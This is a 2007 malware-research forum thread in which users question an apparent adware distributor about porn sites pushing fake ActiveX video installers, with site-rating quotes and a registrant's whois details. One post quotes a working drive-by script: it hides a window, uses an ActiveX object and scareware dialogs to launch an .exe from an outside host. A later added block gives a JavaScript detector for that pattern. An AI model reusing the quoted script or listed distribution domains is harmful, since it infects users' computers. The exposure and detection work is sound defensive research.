haxibus
Cadet

 Joined: Jul 11, 2007 Posts: 3 Location: USA
|
Posted: Wed Jul 11, 2007 9:00 am Post subject: |
|
|
hi. spamming botnet are hitting my forums spamming these links. f*** you people for wasting my time having to delete them, and potentially infecting my users with this bullshit. f*** you guys for posting highly nsfw images in genius threads like "FREE SEX VIDEO LIST 5" on a forum that is read by children under 18. You are going down, i'm not letting this bullshit go on.
this is a dns of one of the sites related to / linking to it:
http://www.dnsstuff.com/tools/whois.ch?ip=toppornclips.com
http://www.dnsstuff.com/tools/whois.ch?ip=free3xmovies.com
both offering this information:
| Quote: | Using 23 day old cached answer (or, you can get fresh results).
Hiding E-mail address (you can get results with the E-mail address).
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com
Domain Name: FREE3XMOVIES.COM
Registrant:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Creation Date: 27-Nov-2006
Expiration Date: 27-Nov-2007
Domain servers in listed order:
ns1.free3xmovies.com
ns2.free3xmovies.com
Administrative Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Technical Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Billing Contact:
n/a
Tcai Tarasko ***@toppornclips.com)
Saksagans'kogo vul., 138
Kiyiv
null,01032
UA
Tel. +003.044434916
Status:ACTIVE |
so if that's the real whois information, then these guys are based in Kiev, Ukraine. googling that name brings up | Code: | | http://www.amino.dk/view.asp?topicID=10989&pageNo= | which appears to be dealing somehow with the same thing but i don't see how... I don't recognize the language, and there are no cognates to anything i know except for "hahaha" (real helpful).
is linking to these sites on subpages like | Code: | | http://www.gorunger.com/6.html | that one, it loads 3xvideos in a frame.
| Code: | | scanner.malwarealarm.com | also appears to be connected there and is potentially infectious (don't go there just in case) but i'm not inclined to find out. google reveals that it's on at least 1 malware block list.
Edited by moderator for language and to disable the live links
haxibus
Cadet

 Joined: Jul 11, 2007 Posts: 3 Location: USA
|
Posted: Wed Jul 11, 2007 5:08 pm Post subject: |
|
|
| Quote: | Edited by moderator for language and to disable the live links |
oh sorry i'll keep it in mind next time, i was angry and tired. i still am, actually.
i'll be back in a few days.
AnthW
Trooper

 Joined: Jul 10, 2007 Posts: 16 Location: USA
|
Posted: Wed Jul 11, 2007 5:16 pm Post subject: |
|
|
| tacktick wrote: | Hi Anthony,
I am encouraged to see you post here.
You say that you are not hiding, so I have a few questions for you.
Is there a business entity and name that you and your team work under?
Are you located in the US?
How do your affiliates connect with and correspond with you?
|
We have many people in our team (programmers, designers, webmasters); however, we don't have any business entity because we don't need one.
I am not in the US. Neither are most people from our team.
Our affiliates / partners correspond with us via email or messengers.
| tacktick wrote: |
As you say you are not responsible for all the domains listed here, I am curious as to which ones you do own or are connected with.
(Current Live domains)
Are these yours?
|
The following domains belong to us:
| Code: |
http://www.axvideosetup.com/download.php?id=1862
http://iaxobjectdownload.com/download.php?id=4058
http://installvaxobject.com/download.php?id=4040
http://www.videoaxdownload.com/download.php?id=1303
http://getimageactivex.com/download.php?id=1103
|
These ones are used as promo tools. They belong to us or to our affiliates:
| Code: |
http://www.onlyfreepornvideos.com/
http://todaysfreevideo.com
http://free3xmovies.com
http://www.adultvideosportal.com
http://www.fulltimempegs.com
http://www.freeimageheaven.com/
http://www.dailyxvids.com/
|
All other domains are not ours and we have no connection to them.
I also have an update. We have changed our EULA and it will be updated VERY soon (say 3-4 hours after this post). The EULA now has a CLEAR description of what the software does and how to uninstall it. We have almost finished our new 'easy to use' uninstallers. Everything will be removable from Control Panel. No additional uninstaller will be required. They will be online within 24 hours. Our webmaster will start working on a website tomorrow morning.
AnthW
Trooper

 Joined: Jul 10, 2007 Posts: 16 Location: USA
|
Posted: Wed Jul 11, 2007 5:21 pm Post subject: |
|
|
haxibus, I understand your anger.
However, your post just proves what I have written before. We can't control everything and every hit coming to our domains.
Our admins have blocked the URL with that ID and it is now unavailable.
hXXp://www.gorunger.com/6.html
I am sorry for the webmaster who did this. We do not appreciate this type of 'promotion'.
JeanInMontana
Sergeant
 Premium Member
 Joined: Jun 20, 2005 Posts: 148
|
Posted: Wed Jul 11, 2007 6:01 pm Post subject: |
|
|
I don't think there is anyone with a conscience that appreciates your type of "promotion"! Block all of them because all of them are spamming all over with the same crap! No one is buying that you are unaware either. _________________ MontanaMenagerie
haxibus
Cadet

 Joined: Jul 11, 2007 Posts: 3 Location: USA
|
Posted: Wed Jul 11, 2007 7:08 pm Post subject: |
|
|
| AnthW wrote: | haxibus, I understand your anger.
However, your post just proves what I have written before. We can't control everything and every hit coming to our domains.
Our admins have blocked the URL with that ID and it is now unavailable.
hXXp://www.gorunger.com/6.html
I am sorry for the webmaster who did this. We do not appreciate this type of 'promotion'. |
you spineless piece of ... oh right, i can't curse.
do you think we're idiots? every other subpage on gorunger.com links to virii and scanner.malwarealarm.com. In fact, while you may have removed the image from 6.html, the page still opens scanner.malwarealarm.com in a hidden frame, and i suspect the only thing that is protecting me from infection is my extremely content-suspicious configuration and heavily updated antivirus. you have some kind of highly evil looking javascript running there:
| Code: |
showwindow('x:10000; y:10000', 'w:1; h:1');
is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
is_IE=false;
if (navigator.appName.toLowerCase()=='microsoft internet explorer'){
    if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; }
}
if(is_XP_SP2) {
    var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
    document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");
}
if(confirm('NOTICE: If your computer has been running slower than normal, it may be infected with Viruses, Adware or Spyware.\n\nMalwareAlarm will perform a quick and completely FREE scan of your system for malicious programs.\n\nDownload MalwareAlarm for FREE now!'))
{
    alert('MalwareAlarm will scan your system for threats now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.');
    if (is_IE) {
        if (is_XP_SP2) {
            iie.launchURL("http://scanner.malwarealarm.com/a/Install1136.exe");
        } else {
            w=screen.width/2-280;
            h=screen.height/2-60;
            window.open("http://scanner.malwarealarm.com/a/Install1136.exe","new", "width=580,height=180,left="+w+",top="+h);
        }
    } else {
        w=screen.width/2-280;
        h=screen.height/2-60;
        window.open("http://scanner.malwarealarm.com/a/Install1136.exe", "_blank", "width=580,height=180,left="+w+",top="+h);
    }
};
showwindow('x:0; y:0', 'w:' + window.screen.width + '; h:' + window.screen.height);
window.resizeTo(window.screen.width, window.screen.height);
window.open('scan.php', '_self');
window.focus();
|
i suggest we stop arguing with this scum (he's stalling for time) and the moderators check his ip address and if he's not using a proxy server report him to his ISP ASAP and if he's in a country where the police will care, inform them too.
see you guys on friday, i have to go now.
edit: http://www.microsoft.com/technet/security/Bulletin/MS06-078.mspx
it appears to be this exploit.
 |
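The traits visible in the script quoted in the post above (a 1x1 window parked off-screen, an ActiveX object written by script, a launch aimed at an .exe, a scare dialog, branching on XP SP2 markers) can be checked statically before a page reaches users. The following is an added example, not code from the thread or its participants; the rule ids, weights, thresholds and the `example.invalid` host are assumptions.

```javascript
// Added example: static heuristics for the fake-scanner pattern quoted above.
// Rule ids, weights and thresholds are assumptions, not a vetted signature set.
const RULES = [
  { id: 'hidden-window-geometry', weight: 2, // 0/1 pixel size or far off-screen position
    re: /\b(?:w|h|width|height)\s*[:=]\s*['"]?[01]\b|\b(?:x|y|left|top)\s*[:=]\s*['"]?-?\d{4,}\b/i },
  { id: 'script-written-activex', weight: 3, // document.write of an <object classid=...>
    re: /document\.write\s*\([^)]*<object[^>]*classid/i },
  { id: 'executable-launch', weight: 3,      // launchURL()/window.open() aimed at a binary
    re: /(?:launchURL|window\.open)\s*\(\s*['"][^'"]+\.(?:exe|scr|msi)['"]/i },
  { id: 'scareware-dialog', weight: 2,       // confirm()/alert() claiming an infection
    re: /\b(?:confirm|alert)\s*\(\s*['"][^'"]*\b(?:infected|viruses|spyware|adware)\b/i },
  { id: 'os-build-gating', weight: 1,        // branches on XP SP2 markers in the user agent
    re: /navigator\.(?:userAgent|appMinorVersion)[^;]*\b(?:SV1|SP2)\b/ },
];

// Rewrite a URL so it cannot be clicked or auto-linked (hXXp style, as in the thread).
function defang(url) {
  return url.replace(/^http/i, 'hXXp').replace(/\./g, '[.]');
}

// Score one script body: matched rule ids, total score, verdict, defanged binary URLs.
function scanScript(source) {
  const hits = RULES.filter((r) => r.re.test(source));
  const score = hits.reduce((sum, r) => sum + r.weight, 0);
  const verdict = score >= 6 ? 'block' : score >= 3 ? 'review' : 'allow';
  const urls = source.match(/https?:\/\/[^\s'"<>]+\.(?:exe|scr|msi)\b/gi) || [];
  return { hits: hits.map((r) => r.id), score, verdict,
           payloads: [...new Set(urls)].map(defang) };
}

// Constructed sample modelled on the quoted script; the host is a placeholder.
const SUSPECT = `
showwindow('x:10000; y:10000', 'w:1; h:1');
is_XP_SP2 = navigator.userAgent.indexOf("SV1") != -1;
if (is_XP_SP2) {
  document.write("<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>");
}
if (confirm('NOTICE: your computer may be infected with Viruses, Adware or Spyware.')) {
  if (is_XP_SP2) { iie.launchURL("http://scanner.example.invalid/a/Install.exe"); }
  else { window.open("http://scanner.example.invalid/a/Install.exe", "_blank", "width=580,height=180"); }
}`;

// Constructed benign sample: an ordinary help popup with normal dimensions.
const BENIGN = `
var w = screen.width / 2 - 280;
window.open("/help/index.html", "help", "width=580,height=180,left=" + w);
alert('Your changes were saved.');`;

console.log(scanScript(SUSPECT));
console.log(scanScript(BENIGN));
```

The weights favour the two behaviours that move a binary onto the machine; the dialog text and window geometry alone only reach the review threshold together.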
DLipman
Cadet

 Joined: Dec 26, 2005 Posts: 3 Location: USA
|
Posted: Wed Jul 11, 2007 9:29 pm Post subject: |
|
|
| Quote: | < snip >
do you think we're idiots? every other subpage on gorunger.com links to virii and
< snip > |
Although a bit pedantic, please rephrase.
There is NO such terminology of viri or virii. The terminology is viruses. Additionally, the activity seen here is non-viral in the form of trojans such as the ZLob and DNSChanger. I have seen NO connections to "viruses". If there are indeed "viruses" associated with this malware group, please provide that information to me. _________________ --
Dave
http://www.pctipp.ch/downloads/dl/35905.asp
tacktick
MIRT Hunter Premium Member
 Joined: May 19, 2007 Posts: 624 Location: USA
|
Posted: Thu Jul 12, 2007 12:50 am Post subject: |
|
|
Haxibus, I believe Anthony is saying that gorunger.com is not controlled by him, it is an affiliate.
It looks like that site no longer links to 3xvideos.
The malwarealarm installer is not connected with Video Activex Access as
far as I know.
Please be civil as much as possible, and if you cannot do not post here. _________________ Analyzing, reporting and removing Malware. Fight the Scourge!
tacktick
MIRT Hunter Premium Member
 Joined: May 19, 2007 Posts: 624 Location: USA
|
Posted: Thu Jul 12, 2007 1:34 am Post subject: |
|
|
Anthony said:
| Code: |
The following domains belong to us:
http://www.axvideosetup.com/download.php?id=1862
http://iaxobjectdownload.com/download.php?id=4058
http://installvaxobject.com/download.php?id=4040
http://www.videoaxdownload.com/download.php?id=1303
http://getimageactivex.com/download.php?id=1103
These ones are used as promo tools. They belong to us or to our affiliates:
http://www.onlyfreepornvideos.com/
http://todaysfreevideo.com
http://free3xmovies.com
http://www.adultvideosportal.com
http://www.fulltimempegs.com
http://www.freeimageheaven.com/
http://www.dailyxvids.com/
All other domains are not ours and we have no connection to them.
|
To clarify for people who are jumping in here. We are talking about Video Activex Access / Object software available from the links above. According to Anthony, he does not have anything to do with DNSChanger variants, fake codecs and newmediacodec.
_________________ Analyzing, reporting and removing Malware. Fight the Scourge!
suzicat
Microsoft MVP Premium Member
 Joined: Sep 10, 2004 Posts: 416
|
Posted: Thu Jul 12, 2007 2:17 am Post subject: |
|
|
First, regarding haxibus' use of viri or virii, it may be grammatically and technically incorrect, but many people use that terminology to refer to malware in general. We know that viruses are technically file infectors, but the word virus is also used somewhat generically to mean any malware. I expect that's how haxibus was using the terms. I've found that many people don't really understand the word malware or even trojan, but they do understand virus.
I have some comments for Anthony as well as some feedback on the sites he claims to be associated with.
http://www.siteadvisor.com/sites/onlyfreepornvideos.com/summary/
Reviewer comments:
| Quote: | This is yet another porn site that goads you into downloading a rogue codec so that you can view a video. The rogue codec is served from getaxinstall.com (download.php?id=107). That site is a known source of rogue codecs. Said "codec" is a trojan downloader that will lead to a spyware infestation.
In addition, onlyfreepornvideos.com contains hundreds of links to other porn sites that are known sources of malware, including dailyxvids.com, free3xmovies.com and toppornclips.com. These sites are already rated RED by SiteAdvisor. For more information, see mechBgon's review of getaxinstall.com |
http://www.siteadvisor.com/sites/todaysfreevideo.com Site Advisor reports:
| Quote: | | In our tests, we found downloads on this site that some people consider adware, spyware, or other unwanted programs |
Reviewer comments:
And so on. There are similar comments about other domains.
Sites that Andrew claims "belong to us"
http://www.siteadvisor.com/sites/axvideosetup.com
Reviewer comments:
| Quote: | | As mechBgon has already pointed out, this site is a distribution point for rogue codecs that are downloaded via links from malicious porn sites. This site has no home page - the only thing a visitor (or SiteAdvisor's robots) will see is a "forbidden" message. The malware is distributed from directories within the site that are not accessible from the home page. Naturally, the site registrar is ESTDOMAINS, well-known for their association with fraudulent and malicious web sites. |
http://www.siteadvisor.com/sites/iaxobjectdownload.com/summary/
Reviewer comments:
| Quote: | | This website is bad. The download pretends to be an add-on that lets you view porn pictures, but it is actually a harmful Trojan Horse program from the Zlob family, which will infest your computer with spyware and harass you to buy worthless, bogus "security" software from the WinFixer gang. |
http://www.siteadvisor.com/sites/installvaxobject.com
http://www.siteadvisor.com/sites/videoaxdownload.com
http://www.siteadvisor.com/sites/getimageactivex.com/summary/
Anthony, would you care to comment on those?
I don't understand this statement:
| Quote: | | We have many people in our team (Programmers, designers, webmasters) however we dont have any business entity because we dont need one. |
I assume the programmers, designers, webmasters and affiliates you referred to make money from the installation of your software. That would indicate to me there is some kind of business arrangement. There has to be a money trail. Whenever money is exchanged for goods or services, that is "business" whether or not you consider it a business entity.
You said:
| Quote: | | I can say that sometimes our adware products are used by our affiliates in unfair tactics such as exploits and stuff. We strongly prohibit this and we block any webmaster’s account found breaking our rules. However we can not predict everything and sometimes we have to deal with dumb webmasters that simply cause us some troubles. |
Blaming your affiliates and "dumb webmasters" is the oldest excuse in the book and does not cut it. You say your affiliates use "unfair tactics such as exploits" and your webmasters "break the rules", but you are directly responsible for their behavior. It is your job to manage and police them. If your software is being installed through exploits or deceptive means, you are fair game for anti-virus, anti-spyware and anti-malware vendors to target. Having a EULA and being able to use Add/Remove Programs does not help as long as the software is being installed through malicious, deceptive means. Managing affiliates and webmasters means doing it proactively, not after they've already broken the rules. There are NO excuses for this.
Regards,
Suzi
IP: 69.232.*.*
Guest
tacktick
MIRT Hunter Premium Member
 Joined: May 19, 2007 Posts: 624 Location: USA
|
Posted: Thu Jul 12, 2007 3:11 am Post subject: |
|
|
| Anonymous wrote: | http://www.spamhaus.org/sbl/sbl.lasso?query=SBL56511
|
What the heck?
Those are screenshots that I uploaded to freeimagehosting.net myself.
Somebody made a mistake there.
I will send an email to spamhaus.
Thanks.
Update:
I just got an email back from Spamhaus, they fixed this mistake.
Fast response.  _________________ Analyzing, reporting and removing Malware. Fight the Scourge!
AnthW
Trooper

 Joined: Jul 10, 2007 Posts: 16 Location: USA
|
Posted: Thu Jul 12, 2007 5:19 pm Post subject: |
|
|
haxibus, we do not own or operate the domain gorunger.com.
When I saw your complaint here, we blocked the URL that webmaster was using to send traffic to us. This is all we can do actually.
We also don't operate malwarealarm.com and have no connection to that domain.
AnthW
Trooper

 Joined: Jul 10, 2007 Posts: 16 Location: USA
|
Posted: Thu Jul 12, 2007 5:40 pm Post subject: |
|
|
| suzicat wrote: |
...
Anthony, would you care to comment on those?
|
Yes.
I didn't want to quote the whole message, so let me give some small comments on those 'reviews'
1. We don't use the term codec on our websites. So I think whoever posted a comment on SiteAdvisor had made a mistake.
2. "In our tests, we found downloads on this site that some people consider adware, spyware, or other unwanted programs"
I also think that our software is adware. So? I totally agree with this term.
3. "This website is bad... actually a harmful Trojan Horse ..."
As far as I know "Trojan" is something that downloads something else secretly. Isn't it? If it is, then why is our software a trojan?
We have warned the user in the EULA about what will be installed. The installation process is not a secret. The user can see what is being done and the process can be canceled at any time.
As for affiliates... We didn't say that "dumb webmasters" is a good excuse. I gave my apologies to haxibus and we blocked the URL after I saw his complaint. We strongly prohibit spam or using exploits, that's why we have terms and an install wizard. The user has to click the Next button and no one actually forces him to do that. There is no AUTO-install or something. I think this is quite enough to prevent exploit or any other 'auto-install' tactics.
JeanInMontana
Sergeant
 Premium Member
 Joined: Jun 20, 2005 Posts: 148
|
Posted: Thu Jul 12, 2007 6:10 pm Post subject: |
|
|
Anthony, one of your promotion sites is offering up teen porn. Teens are considered children until at least 18 and in some cases 21, which makes this child porn. hxxp://www.onlyfreepornvideos.com/ IP address 81.0.250.249
How can you justify that? Or is that the reason you have that site hosted in the Czech Republic? _________________ MontanaMenagerie
|